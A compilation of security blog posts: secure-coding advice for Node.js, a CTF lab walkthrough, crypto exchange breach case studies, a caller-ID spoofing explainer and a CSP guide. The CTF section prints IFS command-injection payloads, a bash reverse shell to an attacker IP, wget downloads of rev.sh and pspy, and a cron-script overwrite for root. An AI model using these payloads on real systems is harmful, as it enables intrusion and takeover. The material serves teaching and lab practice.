// In your form rendering logic
const csrfToken = generateCsrfToken(); // Generate a CSRF token
res.send(`
  <form action="/transfer" method="POST">  
  <!-- Use POST for state changes -->
    <input type="hidden" name="csrf_token" value="${csrfToken}">
    <input type="hidden" name="amount" value="1000">
    <input type="hidden" name="to" value="attacker_account">
    <button type="submit">Transfer</button>
  </form>
`);

On the server side, verify the CSRF token before processing the request:

app.post('/transfer', (req, res) => {
  const { csrf_token } = req.body;
  if (!isValidCsrfToken(csrf_token)) {
    return res.status(403).send('Invalid CSRF token');
  }
  // Proceed with fund transfer
});

Why This Works

By requiring a valid CSRF token for state-changing requests, you ensure that only legitimate requests originating from your application can be processed. Additionally, using POST instead of GET for state changes is crucial, as it prevents attackers from triggering unintended actions through simple image tags or links. Leveraging frameworks with built-in CSRF token protection (using tokens in headers or as POST parameters) further enhances security against CSRF attacks.

Additional Mitigation Tips

1. Use POST for State-Changing Requests: Ensure that any action that modifies data (like transfers or account changes) only accepts POST requests. GET requests should be reserved for retrieving data, not for making changes.

2. Implement SameSite Cookies: Setting the SameSite attribute on cookies can help to prevent them from being sent with cross-site requests, reducing the risk of CSRF.

3. Verify the Origin or Referer Headers: As an additional layer, check the Origin or Referer headers to ensure that the request comes from your domain.

7. Using eval()

The eval() function executes a string of JavaScript code in the context of the current execution environment. If user input is passed to eval() without proper validation, it can lead to serious security vulnerabilities.

How It Affects Your System

Using eval() with untrusted data can allow attackers to execute arbitrary code, potentially compromising the entire application.

Example Scenario

// Bad: Using eval with user input
const userInput = "2 + 2"; // Attacker could input malicious code
const result = eval(userInput); // Executes the input as code
console.log(result); // This will log 4 if input is safe, but can execute anything else

If an attacker provides input like alert('Hacked!'), it will execute that code, leading to unwanted behavior.

Good Code Practice

Instead of using eval(), consider safer alternatives like Function constructor or libraries designed for evaluating mathematical expressions:

NOTE: Although the Function constructor is sometimes suggested, it is not recommended for production code due to similar risks.

// Good: Avoid using eval
const safeEval = (input) => {
  if (/^[0-9+\-*\/\s()]*$/.test(input)) {
    return new Function(`return ${input}`)(); // Only allow safe mathematical expressions
  } else {
    throw new Error('Unsafe input detected');
  }
};

const result = safeEval("2 + 2"); // Safe evaluation
console.log(result); // Outputs 4

Why This Works

Using the Function constructor is still risky and is categorized as Direct Dynamic Code Evaluation, which can lead to eval Injection attacks if user input is not strictly validated. Although it limits the scope of execution compared to eval(), it can still allow the execution of arbitrary code if misused.

8. Loose Comparisons (Type Juggling)

Using loose equality comparisons (==) instead of strict equality (===) can lead to unexpected behaviour in your application. This is often referred to as type juggling, where JavaScript automatically converts one or both operands to a common type before performing the comparison. Type juggling can be exploited in attacks, leading to security vulnerabilities.

How It Affects Your System

Loose comparisons may allow for type coercion, leading to bugs and potential security vulnerabilities if unexpected types are compared.

console.log(0 == '0');      // true
console.log(false == '0');  // true
console.log(null == undefined); // true

Example Scenario

// Bad: Loose comparison leading to security flaw
const userRole = 'admin'; // This is the role assigned to the user

if (userRole == 'admin') {
  console.log('Access granted'); // Expected behavior
} else {
  console.log('Access denied');
}

// Now, a low-privilege user might manipulate their role with unexpected input
const manipulatedRole = '0'; // An unexpected input that can be coerced

if (manipulatedRole == false) {
  console.log('Access granted'); // This will incorrectly grant access
} else {
  console.log('Access denied');
}

This can lead to situations where unexpected input is considered valid due to type coercion.

Good Code Practice

// Good: Using strict equality to avoid type coercion
const userRole = 'admin'; // This is the role assigned to the user

if (userRole === 'admin') {
  console.log('Access granted'); // Expected behavior
} else {
  console.log('Access denied');
}

// Even if a user tries to manipulate their role with unexpected input
const manipulatedRole = '0'; // An unexpected input that will not match

if (manipulatedRole === false) {
  console.log('Access granted'); // This will NOT grant access
} else {
  console.log('Access denied'); // Correctly denies access
}

Why This Works

Strict comparisons ensure that both the type and value must match, preventing unexpected type coercion.

9. Unvalidated Redirects and Forwards

Unvalidated redirects and forwards occur when an application allows users to redirect to external URLs or forward to other internal resources without proper validation. This can lead to security vulnerabilities where attackers can exploit these features to redirect users to malicious sites or perform unwanted actions within the application. This vulnerability is also known as open redirection.

How It Affects Your System

Unvalidated redirects and forwards can expose your users to various risks, such as phishing and malware attacks. When users are redirected to untrusted or malicious sites, they may unknowingly provide sensitive information to attackers, believing they are interacting with your legitimate application. This can result in identity theft, loss of credentials, and unauthorized access to user accounts. Furthermore, if your application is exploited to facilitate such attacks, it can harm your reputation and user trust, leading to a decline in user engagement and potential legal repercussions.

In addition, internal forwards without validation can allow attackers to access restricted areas within your application or bypass authorization checks. This could lead to data breaches or unauthorized actions within your application, making it crucial to validate redirect and forward requests properly.

Example Scenario

// Bad: Redirecting without validation
app.get('/redirect', (req, res) => {
    const redirectUrl = req.query.url; // No validation on the URL
    res.redirect(redirectUrl); // Redirects to any URL
});

If a user clicks on a link like https://yourapp.com/redirect?url=https://malicious-site.com, they will be redirected to a malicious site, potentially exposing them to phishing attacks or malware.

Good Code Practice

To mitigate this risk, it is essential to validate the redirect URL. Moreover, you should ensure that all allowed URLs use HTTPS to prevent downgrade attacks.

// Good: Validating the redirect URL
const allowedUrls = ['https://trusted.com'];
app.get('/redirect', (req, res) => {
    const url = req.query.url;
    if (!allowedUrls.includes(url)) {
        return res.status(400).send('Invalid URL');
    }
    // Ensure the URL starts with HTTPS to prevent downgrade attacks
    if (!url.startsWith('https://')) {
        return res.status(400).send('URL must use HTTPS');
    }
    res.redirect(url);
});

Why This Works

Validating the redirect URL prevents attackers from redirecting users to malicious sites. By maintaining a whitelist of allowed URLs, you ensure that users can only be redirected to trusted locations, mitigating the risk of phishing and other attacks that exploit unvalidated redirects and forwards.

10. File Upload Exploit

File upload vulnerabilities occur when an application allows users to upload files without proper validation or restrictions. This can lead to malicious files being uploaded and executed on the server, potentially leading to data breaches or server compromise.

How It Affects Your System

Attackers can exploit insecure file upload functionality to upload malicious scripts or executables that can be run on the server, gaining unauthorized access or control over the system.

Example Scenario

Consider a web application that allows users to upload profile pictures:

// Bad: Allowing any file type upload
app.post('/upload', (req, res) => {
    const file = req.files.picture; 
    // Assume file is uploaded via a file input
    file.mv(`./uploads/${file.name}`, (err) => {
        if (err) return res.status(500).send(err);
        res.send('File uploaded!');
    });
});

In this scenario, an attacker could upload a malicious PHP file (e.g., malicious.php) and execute it by accessing it directly:

http://example.com/uploads/malicious.php

Good Code Practice

To mitigate the risks associated with file uploads, implement the following best practices:

1. File Type Validation: Check the file extension and MIME type against a whitelist of allowed types.

2. Magic Header Bytes Check: In addition to MIME type validation, verify the file's magic header bytes to ensure it matches the expected format.

3. Limit File Size: Set restrictions on the maximum file size to prevent abuse.

4. Rename Uploaded Files: Rename files upon upload to avoid execution of malicious code and prevent filename conflicts.

5. Store Files Outside the Web Root: Save uploaded files in a directory that is not publicly accessible to prevent direct access.

const fs = require('fs');
const path = require('path');

// Good: Validating file type and renaming files
app.post('/upload', (req, res) => {
    const file = req.files.picture;

    // Validate file type
    const validTypes = ['image/jpeg', 'image/png', 'image/gif'];
    if (!validTypes.includes(file.mimetype)) {
        return res.status(400).send('Invalid file type');
    }

    // Magic header bytes check (for example purposes; implement according to your needs)
    const magicBytes = {
        'image/jpeg': Buffer.from([0xff, 0xd8, 0xff]),
        'image/png': Buffer.from([0x89, 0x50, 0x4e, 0x47]),
        'image/gif': Buffer.from([0x47, 0x49, 0x46]),
    };
    const fileBuffer = fs.readFileSync(file.tempFilePath);
    const fileMagic = fileBuffer.slice(0, magicBytes[file.mimetype].length);
    if (!fileMagic.equals(magicBytes[file.mimetype])) {
        return res.status(400).send('Invalid file content');
    }

    // Limit file size (e.g., max 1MB)
    const maxSize = 1 * 1024 * 1024; // 1MB
    if (file.size > maxSize) {
        return res.status(400).send('File too large');
    }

    // Sanitize the original file name

    // Get base name without extension
    const originalFileName = path.basename(file.name, path.extname(file.name));

    // Allow only alphanumeric, underscores, and hyphens
    const sanitizedBaseName = originalFileName.replace(/[^a-zA-Z0-9_-]/g, '');

    // Generate a safe filename by combining sanitized base name with a timestamp
    const timestamp = Date.now();
    const safeFileName = `${sanitizedBaseName}_${timestamp}${path.extname(file.name)}`;
    const uploadPath = path.join(__dirname, 'uploads', safeFileName);
    // Restrict to uploads directory

    // Move the file to a safe directory
    file.mv(uploadPath, (err) => {
        if (err) return res.status(500).send(err);
        res.send('File uploaded!');
    });
});

Why This Works

By validating file types, checking magic header bytes, limiting file sizes, renaming uploaded files, and storing them outside of the web root, you significantly reduce the risk of file upload vulnerabilities. These practices enhance the overall security of your application by ensuring that only safe files are accepted and executed.

Additional Mitigation Tips

1. Ensure Folder Permissions: Configure the upload folder with chmod settings that do not allow execution (e.g., chmod 644 for files).

2. Magic Header Bytes Limitations: Be aware that magic header bytes checking can be bypassed if attackers manipulate the byte headers. Always combine this with other validation methods like server-side MIME type checks.

3. Client-Side & Server-Side Validation: Validate the file's MIME type on both the client and server-side to ensure it matches the expected format. However, do not rely solely on client-side validation, as it can be manipulated by attackers.

Conclusion

As we wrap up this journey through the various security vulnerabilities and their mitigations, I want to emphasize the importance of adopting a proactive mindset towards securing coding practices. Each vulnerability we’ve explored, from SQL Injection to File Upload Exploits, represents not just a potential risk, but an opportunity for us as developers to fortify our applications and protect our users.

The world of security may seem daunting, but it’s essential to remember that every developer starts somewhere. Just as I faced my initial challenges with secure coding during VAPT reviews, you too can transform your approach to coding security. By understanding these vulnerabilities and implementing the recommended best practices, you’re not just fixing issues — you’re building a robust foundation for your applications.

The tools and techniques we’ve discussed are here to help you create secure, resilient code that can stand up to scrutiny and keep your users safe. Embrace the learning process, ask questions, and continually seek to enhance your understanding of secure coding practices. With every vulnerability you address, you’re making your software more trustworthy, ensuring a better experience for everyone who interacts with it.

Thank you for taking the time to read this guide. I hope it empowers you to become a more security-conscious developer, turning challenges into stepping stones for growth. Together, let’s strive to make the web a safer place, one line of code at a time. Happy coding! 🛡️✨

Lab Overview - My script to convert videos to MP3 is super secure.

A perfect room to understand from basic enumeration to limiting findings abusing a single found web application functionality trying to execute command injection using IFS and getting low privilege shell to further abusing cronjob to becoming a root.

TASK1  :  Recon

We will run an Nmap aggressive scan against our target.

nmap -A -sV 10.10.163.162 -v

Here is our Nmap result, where we can find 2 ports (22 and 80) as open to SSH. Since we need credentials, let’s go with port 80.

While opening the URL: http://10.10.163.162 in the browser, we found a webpage where we can convert our videos.

Convert My Video

Let’s give some input and check what it does.

We don’t clearly understand what it’s trying to do and why we are getting such an error.

So our next step will be enumerating further.

TASK2  :  Enumerating

For this task, we will capture this request and response in BURP.

So let’s try command injection in the yt_url parameter.

yt_url = ls

As we can see, it uses YouTube-DL software. Let's enumerate this.

youtube-dl is a command-line program to download videos from YouTube and a few other sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and is not platform-specific. It should work on your Unix box, on Windows, or on macOS. It is released to the public domain, which means you can modify it, redistribute it, or use it however you like.

We get a sort of command injection here.

yt_url = ls

At this point, we start struggling with which command to run, as commands with spaces are not allowed.

After a bit of googling, we found something called IFS. It is a special shell variable, it stands for Internal Field Separator.

yt_url=`ls${IFS}-la`

Using this, we are getting a response. At least the command is being executed on the server.

On multiple retries and failures, we found something interesting.

TASK3 : Exploitation

So we search for a one-liner reverse shell in bash.

bash -i >& /dev/tcp/10.11.48.237/9090 0>&1

Now we have to send this to the victim. I am hosting this payload using an HTTP server.

Using wget, we will try to download this payload on the victim machine. Then, we will execute it.

wget${IFS}http://10.11.48.237/rev.sh

We will provide the execution permission to the payload and try to run it.

`chmod${IFS}777${IFS}rev.sh`

Let's start a listener on port 9090 as per our reverse shell payload and run this.

`bash${IFS}rev.sh`

BOOM!!!!!!!!!!! We got our low-level shell.

TASK4 : Privilege Escalation

Let's check the crontabs for any scheduled tasks executed by the root user.

Crontab -l

cat /etc/crontab

ps aux

Check the running process, as in the above approach we haven’t found anything juicy.

We found a cronjob being executed as a root user.

We can automate this process using linpeas.sh or linenum.sh which will highlight such interesting cronjobs in red.

We found a very interesting tool, pspy, to look into the Linux process.

pspy is a command-line tool designed to snoop on processes without needing root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs.

Also great to demonstrate to your colleagues why passing secrets as arguments on the command line is a bad idea.

The tool gathers the info from procfs scans. I notify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.

We have downloaded this tool on the attacker machine and will send it to the victim the way we shared rev.sh

wget http://10.11.48.237:8080/pspy64

Provide the required permission to execute it.

It might take 2–3 minutes to complete this job.

Ok, so we found a process running as clean.sh. It is also running as a CRONJOB. Is this Cronjob overwriting? Let's give this a try.

Navigate to /var/www/html/tmp/clean.sh and check what it's doing.

Modify our 1 liner and integrate it into this file.

bash -i >& /dev/tcp/10.11.48.237/5555 0>&1

And we are root

TASK5 :  Capture the Flags

What is the name of the secret folder?

Admin

What is the user to access the secret folder?

What is the user flag?

What is the root flag?

Thank you for reading this blog. While attempting this challenge, I learnt so many things. This was a unique target with a unique vulnerability.

Case Studies of Crypto Exchange Hacking

1. Mt. Gox (2014)

• Overview:

  Mt. Gox, based in Tokyo, was the largest Bitcoin exchange at its peak, handling over 70% of all Bitcoin transactions worldwide.

• Incident:

  In February 2014, Mt. Gox announced that approximately 850,000 Bitcoins (valued at around $450 million at the time) were stolen due to a security breach.

• Vulnerabilities Exploited:

• Weak Security Protocols: Lack of robust security measures and insufficient internal controls.

• Transaction Malleability: Exploit in the Bitcoin protocol that allowed attackers to alter transaction IDs.

• Mitigation Strategies Post-Incident:

• Enhanced security measures across exchanges.

• Introduction of multisig (multi-signature) wallets to increase transaction security.

2. Bitfinex (2016)

• Overview:

  Bitfinex is one of the largest cryptocurrency exchanges by trading volume.

• Incident:

  In August 2016, Bitfinex experienced a security breach, resulting in the loss of 119,756 Bitcoins (worth around $72 million at the time).

• Vulnerabilities Exploited:

• Security Flaws in Multisig Wallets: The attack exploited a vulnerability in the multisig wallets provided by BitGo, a third-party service.

• Compromised Private Keys: Attackers managed to compromise private keys used in the multisig wallets.

• Mitigation Strategies Post-Incident:

• Improved security protocols, including enhanced multisig implementations.

• Closer scrutiny and auditing of third-party services.

3. Coincheck (2018)

• Overview:

  Coincheck is a Japanese cryptocurrency exchange.

• Incident:

  In January 2018, Coincheck suffered one of the largest heists in history, losing $530 million worth of NEM tokens.

• Vulnerabilities Exploited:

• Inadequate Cold Storage: Most of the stolen NEM tokens were stored in hot wallets, which are more susceptible to hacking.

• Poor Security Practices: Lack of robust security measures, including multi-factor authentication and proper encryption.

• Mitigation Strategies Post-Incident:

• Adoption of cold storage solutions for most funds.

• Implementation of comprehensive security protocols and regular security audits.

4. Binance (2019)

• Overview:

  Binance is one of the world’s largest cryptocurrency exchanges by trading volume.

• Incident:

  In May 2019, Binance reported a security breach in which hackers stole 7,000 Bitcoins (worth around $40 million at the time).

• Vulnerabilities Exploited:

• API Keys, 2FA Codes, and Other Information: Hackers used a combination of techniques, including phishing and viruses, to obtain API keys, two-factor authentication codes, and other user data.

• Mitigation Strategies Post-Incident:

• Enhanced user authentication mechanisms and security protocols.

• Creation of a Secure Asset Fund for Users (SAFU) to protect user funds in future breaches.

5. KuCoin (2020)

• Overview:

  KuCoin is a global cryptocurrency exchange with a significant user base.

• Incident:

  In September 2020, KuCoin announced that it had detected a security breach, resulting in the theft of over $280 million worth of various cryptocurrencies.

• Vulnerabilities Exploited:

• Compromised Private Keys: Attackers gained access to the private keys of KuCoin’s hot wallets.

• Mitigation Strategies Post-Incident:

• Implementation of more stringent security measures, including enhanced cold storage solutions.

• Collaboration with other exchanges and blockchain projects to recover stolen funds.

Decentralised Exchanges (DEXs)

They are crucial components of the cryptocurrency ecosystem, enabling peer-to-peer trading without a central authority. However, they can be vulnerable to several types of critical vulnerabilities across different domains and parts. Here are some of the key vulnerabilities:

1. Smart Contract Vulnerabilities

a. Reentrancy Attacks:

• Description: This occurs when a smart contract makes an external call to another untrusted contract before it resolves its internal state. This can allow the external contract to call back into the original function, potentially leading to multiple withdrawals of funds.

• Example: The infamous DAO hack in 2016.

b. Logic Flaws:

• Description: Errors in the logic of smart contracts can lead to unintended behavior, such as incorrect calculations or validation errors.

• Example: Inadequate input validation leading to incorrect trading calculations or bypassing security checks.

c. Integer Overflows/Underflows:

• Description: These occur when arithmetic operations exceed the storage capacity of a variable, leading to unexpected behavior.

• Example: Overflowing a balance variable to gain unauthorized funds.

2. Blockchain Layer Vulnerabilities

a. Consensus Mechanism Attacks:

• Description: Attacks targeting the consensus mechanism of the underlying blockchain, such as 51% attacks.

• Example: If an attacker gains control of more than 50% of the network’s hashing power, they could potentially double-spend coins.

b. Front-running:

• Description: When a malicious actor preemptively executes transactions by observing the pending transactions in the mempool, profiting at the expense of legitimate users.

• Example: An attacker observes a large buy order in the mempool and places their own buy order to benefit from the price increase.

3. Off-chain Components

a. Oracle Manipulation:

• Description: Oracles provide external data to smart contracts. Manipulating the data provided by oracles can lead to incorrect contract execution.

• Example: Feeding incorrect price data to manipulate the outcomes of trading contracts.

b. API Exploits:

• Description: Vulnerabilities in the APIs used by DEXs to interact with external services can be exploited to gain unauthorized access or manipulate data.

• Example: Exploiting a poorly secured API to siphon funds or alter trade data.

4. User Interface (UI) Vulnerabilities

a. Phishing Attacks:

• Description: Fake interfaces or websites mimicking legitimate DEX platforms to steal user credentials and private keys.

• Example: Users entering their private keys or seed phrases on a fake DEX site.

b. Man-in-the-Middle (MITM) Attacks:

• Description: Intercepting and altering communications between the user and the DEX platform.

• Example: Intercepting a transaction request and modifying the recipient address.

5. Governance Vulnerabilities

a. Governance Manipulation:

• Description: Exploiting flaws in the governance model to take control of decision-making processes.

• Example: Accumulating governance tokens to propose and pass malicious protocol changes.

6. Liquidity Risks

a. Impermanent Loss:

• Description: When the value of deposited assets in a liquidity pool changes compared to holding them directly, leading to potential losses for liquidity providers.

• Example: Significant price volatility affecting the value of assets in an automated market maker (AMM) pool.

b. Liquidity Mining Exploits:

• Description: Exploiting incentives for providing liquidity to drain funds from the protocol.

• Example: Sybil attack is when an attacker creates multiple addresses to earn disproportionate rewards.

7. Regulatory and Compliance Risks

a. Regulatory Crackdowns:

• Description: Government actions against DEXs for non-compliance with local regulations.

• Example: Regulatory actions leading to the shutdown or restriction of DEX operations.

Tools and Resources

• Reconnaissance: Maltego, Shodan

• Scanning: Nmap, OWASP ZAP, Nessus

• Exploitation: Metasploit, SQLMap, Burp Suite

• Post-Exploitation: Wireshark

• Reporting: Dradis Framework, Faraday

• Static Analysis Tools: Mythril, Slither, Oyente

• Fuzz Testing Tools: Echidna, Harvey

• Blockchain Analysis Tools: Manticore, Eth2.0-specific tools

• Network Monitoring Tools: Wireshark, Zeek

• API Testing Tools: Postman, Insomnia, Burp Suite

• UI Security Tools: OWASP ZAP, Selenium

• Formal Verification Tools: K-framework, Certora Prover

By understanding these vulnerabilities and employing ethical hacking techniques, you can effectively identify and mitigate potential security risks in cryptocurrency exchanges. Regular testing, combined with robust security practices, ensures the protection of digital assets and user data.

That’s all for this write up and stay tuned for Crypto Exchange Hacking Beyond Basics.

Thank You

• To the presentation
• To my Linkedin

All of the infomation showed here is for educational purposes & to raise awareness about our current systems. Please don’t use this information for anything malicious.

How Do Businesses Setup Their Own Phone System?

• This is where Private Branch Exchange (PBX) systems come in to place
• A PBX system is like a router creating a LAN for your legacy (or modern) internal phone systems
• You can connect your PBX system to the public network using SIP trunk providers (similar to ISP’s)
• Giving a single point of entry/exit to all your local phone systems.

Types of PBX

Analog/Legacy PBX

• traditional onsite hardware PBX working via wired PSTN
• business responsible for install/maintenance/monitoring
• limited features + expensive hardware
• obsolete

On-prem PBX

• hosted & managed on site by end user
• powered by VoIP using IP PBX
• requires purchase of own hardware & in house team to maintain hence still expensive

Hosted/Cloud/Virtual PBX

• VoIP based phone system maintained by 3rd party
• has better savings, mobility, scalability
• has advanced VoIP features

Hybrid PBX

• mix of virtual & hardware PBX
• uses SIP trunking
• end user still needs to maintain the on-prem phone system

Why Businesses need Call Spoofing

Even though Alice has a different number, having the ability to spoof her no. with that of the companies allows her to get in touch with the customers

Modern Phone System Protocols

SIP (Session Initiation Protocol)

• The de facto standard (text-based) for VoIP communication, used for initial authentication and negotiations when making connections.
• SIP is an application layer protocol that uses UDP or TCP for traffic. By default, SIP uses UDP/TCP port 5060.

RTP (Real-Time Transport Protocol)

• The actual voice or video traffic is transmitted via Real-Time Protocol (RTP or SRTP) after authentication and negotiations are done via SIP.

SDP (Session Description Protocol)

• SDP (Session Description Protocol) is a text-based format used to describe the characteristics of multimedia sessions, such as voice, video, or data conferencing, over IP networks.
• SDP does not handle the actual media transmission or session establishment but is used in conjunction with other signaling protocols, like SIP, to negotiate and exchange information about the media streams and their attributes.

SHAKEN/STIR

The current protection mechanism against call spoofing. This requires all SIP trunk providers to sign outgoing calls with their certificate, according to the legitimacy of the outbound caller id.

• SHAKEN stands for Signature-based Handling of Asserted Information using toKENs. It is a specification designed by the Alliance for Telecommunications Industry Solutions (ATIS) to fight caller ID spoofing.
• STIR (Secure Telephone Identity Revisited) is a protocol developed by the Internet Engineering Task Force (IETF) to enable end-to-end call authentication, but the protocol is very broad and doesn't ensure that different providers will be able to verify each others' calls.
• The SIP provider certifies the classes of caller ID’s into the following:
  • Class A - (most trusted). The number being dialed from has been authenticated by the service provider, and the caller has been authorized to use that number.
  • Class B - The service provider has verified that the call has originated from the customer but not that they are authorized to use it.
  • Class C - The service provider does not know the caller’s identity and the source of the call cannot be identified (maybe coming from an international gateway/outside their network).

How STIR/SHAKEN Identity headers are received by end users

• credit SIP Identity Headers explained in a nice YT video

Issues with our current system

• Most providers transmit data over clear text
  • Despite the avaliability of TLS encryption with SRTP & SIP-TLS, the lack of industry wide adoption poses a challenge. Anyone with knowledge of the system can capture the data
• Trust on User Defined Outbound Caller ID
  • Though most SIP trunking providers have added protections in place, there are plenty of providers willing to skirt the regulation.
• Protection Mechanism in place doesn’t account for legacy systems in the route
  • In case the call gets routed/forwarded through a legacy system, the data signed by the SIP trunk gets dropped
• SHAKEN/STIR is expensive to maintain
  • SHAKEN/STIR is difficult to maintain, leaving power in the hands of major providers. Also 3rd party SIP trunk resellers can be held liable as service providers despite being dependent on larger providers for their signing method
• Doesn’t factor into the Global context well
  • SHAKEN/STIR was originally made for US/Canada to be deployed in their own countries and was later modified to be more global. Due to political relations between nations & lack of accountability in enforcing these protections across countries it can be difficult to ratify as a standard

Ways To Protect Yourself

• Report fraudulent calls

  • For Indian Citizens:

    • https://sancharsaathi.gov.in/sfc/

    • Report Incoming International Call With Indian Number (RICWIN)

      • https://sancharsaathi.gov.in/InternationalCall/ReportIntCall.jsp
      • Alternatively you can report on 1963/1800110420

• Scammers often try to rush your decision making

  • Before making any major decision based on a possibly fraudulent Call/SMS do the following:
    • Take a deep breath and don't rush yourself
    • Ask probing questions that only the person you're connecting with would know
    • Connect/Communicate with your contact over another medium (email/physically meet)

• Know that the Indian Government is taking steps to reduce these threats

  • Quickest, simplest way TRAI & telco's have stopped spoofed calls from overseas is to look at the phone numbers for each inbound call and to block them if they pretend to have a domestic origin.
    • Note during my testing - it sometimes let the call through but set the caller id as a random number. This behaviour may vary from provider to provider
  • Telecom Regulatory Authority of India (TRAI) issued recommendations on leveraging AI-based fraud detection systems to identify and prevent fraudulent activities, such as unauthorized usage of SIM cards, subscription fraud, and billing fraud.

• Raise Awareness of such issues amongst family & friends

  • The more people are aware, the less likely they are to fall for such scams

Glossary

• VoIP

  • is an acronym for Voice Over Internet Protocol, or in more common terms phone service over the Internet.

• Private Branch Exchange (PBX)

  • It is a private telephone network that is used by an organisation to communicate internally and externally. PBX systems are used to route calls between internal extensions and the public telephone network.

• Session Initiation Protocol (SIP)

  • The de facto standard for VoIP communication, used for initial authentication and negotiations(terminate, or modify) when making connections. (like metadata for comms).
  • SIP is an application layer protocol that uses UDP or TCP for traffic. By default, SIP uses UDP/TCP port 5060.

• SIP Trunk

  • In order for people to make calls to your internal PBX network (and vice verse)- your network must have an actual exposed number - that is the job of SIP Trunk It connects your PBX network to the Public Switched Telephone Network AKA PSTN

• STIR/SHAKEN

  • Caller ID authentication confirms the accuracy of the information. It is more difficult for attackers to spoof numbers with this additional degree of security.

References:

• Setup basics playlist
  • Louis Rossmann FreePBX Setup Playlist
  • FreePBX - Complete Setup Series by CrossTalk Solutions
• Rapid 7 Blog on Build your own Caller ID Spoofer Part 1
• Rapid 7 Blog on Build your own Caller ID Spoofer Part 2
• Spoof caller id on the fly from any phone for legal & legitimate puposes
• warvox manual
• Caller ID spoofing
• VoIP Info
• Wardialing Finnish Phones
• Warvox
• PSTN - Public Switched Telephone Network by Sunny Classroom
• Everything SIP - Session Initiation Protocol by Get VoIP
• SIP INDEPTH by VoIP Info
• SCTP - Stream Control Transmission Protocol
• SS7 - Signalling System No.7
• Interesting history of Signaling System
• STIR/SHAKEN and the Death of the Small VoIP Carrier
• Combating Spoofed Robocalls with Caller ID Authentication by US FCC
• SHAKEN/STIR 2/3: SIP Headers, Identity PASSporT, and Call flow through carrier network
• SIP Pentesting - Hacktricks
• Basic VoIP Protocols - Hacktricks
• Global STIR/SHAKEN Is Dead; What Comes Next?
• TRAI Consulation Paper on Leveraging AI for anomaly detection in telecom sector

Introduction

Content Security Policy (CSP) provides mechanisms for websites to restrict content that browsers will be allowed to load. It is the holy grail for client side web application security. A strong policy can provide monumental protection against threats such as Cross Site Scripting (XSS), Cross-Origin Resource Sharing (CORS), Click-jacking, HTTP Downgrade attacks and much more. This is because a CSP header employs the hardened security framework of the modern browser, baking it into the end users' web application.

However,

the resilience of CSP headers are often compromised during web development due to numerous gaps introduced by developers to support certain libraries/inline scripts/quick integrations etc. Additionally if Content Security Policy (CSP) header is not implemented it can be a major red flag.

Learning from Common Mistakes:

Example of an insecure Content Security Policy (CSP)

Content-Security-Policy: default-src 'self’ <source> *;  
frame-src http://3rdparty.site <source>;  
script-src *.google.com:80 <source> cdn.js unsafe-inline unsafe-eval;

Not sure what frame-src or any other directives are ? - Click here

Insecure default-src:

This is the policy the browser must refer to in case there is no specific one mentioned i.e the default case. Here although the scope of the default-src mentions 'self' (allowing only one's own website as the scope), the presence of '*' directs the browser to accept sources from anywhere. The use of such a broad scope can be very dangerous.

Lack of font-src, img-src, connect-src, media-src & more:

These additional policies have not been mentioned hence default-src would be used. Making the job of tightening the security of default-src paramount. The above policies are used in case you wish to make an exception for a particular src such as img-src, but don’t want to weaken the security of the default/other configurations.

Avoid 'unsafe-eval'/'unsafe-inline':

Using these in any directive is a HUGE risk and must be avoided. Just their mere presence introduces a vector for the execution of DOM based and inline XSS. Instead move the scripts into separate javascript files or use a nonce/hash value

Defining your <source>:

1. Define strict scope even for reputed first party sites

• The use of *.google.com allows all of Google's 1120+ subdomains to be used as a script source. You may still think of it as not a threat, but just to refresh your memory: Anyone can build a website on sites.google.com and it would fulfill the above regex requirements.

2. Be sure about adding 3rd party websites to your CSP

• In case there is any vulnerability present in the 3rd party website, it could lead to an attack vector into your site as well.

3. Always think twice when adding '*' to a CSP regex:

• The sources used in CSP must be precisely defined. Eg if you're accepting a legitimate javascript file from a CDN such as cdn.js, your source should not be cdn.js/* . This is problematic as many public cdn’s allow users to host their own javascript libraries. So an attacker could take advantage of the lax regex and call cdn.js/their-malicious.js.
  

Recommendation:

If Content Security Policy (CSP) header is not set - implement it immediately. The Content Security Policy can be set either in the response header or in the html's meta tag, the prior being given a higher priority.

Example of a Secure Content Security Policy (CSP)

Content-Security-Policy: default-src 'self’; 
frame-src 'self'; 
script-src 'self' https://cdn.jsdelivr.net/npm/@floating-ui/core@1.2.1;
frame-ancestors ‘none’;
report-to csp-error;
report-uri https://sumirbroota.com/csp-violations
upgrade-insecure-requests;

frame-ancestors ‘none’:

This is a suitable setting in case one is not using an iframe in their sites functionality. frame-ancestors restricts the URLs that can embed the requested resource inside of <frame>, <iframe>, <object>, <embed>, or <applet> elements.

• If this directive is specified in a <meta> tag, the directive is ignored.
• This directive doesn't fallback to default-src directive.
• X-Frame-Options is rendered obsolete by this directive and is ignored by the user agents.

upgrade-insecure-requests:

The following directive will ensure that all requests will be sent over HTTPS with no fallback to HTTP

report-to:

Reporting directives delivers violations of prevented behaviors to specified locations. To ensure backwards compatibility report-uri is also used. Example Report-To header

Report-To: {"group":"csp-error","max_age":180000,"endpoints":[{"url":"https://sumirbroota.com/csp-violations"}],"include_subdomains":true}

Language/Framework Specific Examples:

For Apache:

Header always set Content-Security-Policy "default-src 'self';"

in your /etc/apache2/sites-enabled/example.conf file.

For Nginx:

add_header Content-Security-Policy: "default-src 'self’;"; always;

in your server {} block of the /etc/nginx/sites-enabled/example.conf file. Here the always; option specifies to send the CSP no matter the response code.

Use tools such as SeeSPee & Google CSP Evaluator to create a Content-Security-Policy for a website based on the statically detectable relations. Note you will still have to validate it yourself

TLDR

Content Security Policy (CSP) provides a mechanism to websites to restrict content that browsers will be allowed to load e.g. inline scripts, remote javascript files. CSP can be set either in the response header or in the html’s meta tag, the prior being given a higher priority.

Recommendation:

1. Be cautious of 3rd party urls & using '*' in even in trusted urls, if a direct url can be used, it would be best.
2. Do not use 'unsafe-eval'/'unsafe-inline' instead use a nonce or a hash value.
3. default-src directive defines the default policy for fetching resources hence make sure it is airtight.
4. Use other source directives if you wish to make an exception for a specific one but don't want to weaken the security of the other/default directives
5. Avoid using the 'data' scheme as it can be used as a vector for XSS.

References:

1. https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
2. https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/content-security-policy-csp-not-implemented/
3. https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
4. https://content-security-policy.com/examples/nginx/
5. https://webdock.io/en/docs/how-guides/security-guides/how-to-configure-security-headers-in-nginx-and-apache